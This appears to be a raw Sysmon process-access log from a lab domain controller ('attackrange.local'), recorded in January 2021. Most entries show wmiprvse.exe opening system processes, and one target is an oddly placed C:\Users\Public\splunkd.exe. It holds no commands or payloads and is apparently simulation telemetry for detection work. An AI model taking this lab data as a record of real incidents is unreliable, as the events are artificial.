15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 